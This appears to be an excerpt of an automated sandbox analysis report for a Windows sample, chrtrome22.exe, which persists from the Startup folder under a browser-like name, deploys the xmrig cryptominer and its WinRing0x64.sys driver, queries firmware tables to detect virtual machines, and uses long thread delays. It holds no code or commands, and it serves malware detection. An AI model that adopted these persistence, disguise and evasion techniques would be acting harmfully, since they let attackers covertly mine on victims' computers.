Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	System information queried: FirmwareTableInformation			Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	System information queried: FirmwareTableInformation			Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Memory allocated: F80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Memory allocated: 1AB50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Memory allocated: 2AB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Memory allocated: 1AC90000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 599516	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 599406	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 598828	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 598594	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 598484	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 598266	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 598047	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 597938	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 597813	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 597587	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 597281	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 597107	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 595891	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 595563	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 595438	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 595313	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 594969	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 594835	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 594731	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 594612	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 594391	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 594250	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 594136	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 594024	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 599631	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 599329	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 598952	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 598822	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 598704	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 598583	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 598464	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 597688	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 597494	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 597282	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 596907	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 596760	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 596579	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 596404	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 596242	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 596032	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 595700	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 595536	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 595329	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 595157	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 594982	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 594782	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 594304	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Window / User API: threadDelayed 3181	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Window / User API: threadDelayed 6590	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Window / User API: threadDelayed 1557	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Window / User API: threadDelayed 1041	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Window / User API: threadDelayed 881	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe

Dropped PE file which has not been started: C:\xmrig\xmrig-6.22.2\WinRing0x64.sys

Jump to dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 7152	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -34126476536362649s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -599641s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -599516s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -599406s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -599297s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -599188s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -599063s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -598938s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -598828s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -598719s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -598594s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -598484s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -598375s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -598266s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -598156s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -598047s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -597938s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -597813s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -597703s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -597587s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -597422s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -597281s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -597107s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -597000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -596890s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -596781s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -596672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -596562s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -596453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -596344s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -596219s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -596109s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -596000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -595891s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -595781s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -595672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -595563s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -595438s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -595313s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -595203s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -595094s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -594969s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -594835s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -594731s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -594612s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -594391s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -594250s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -594136s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5344	Thread sleep time: -594024s >= -30000s	Jump to behavior
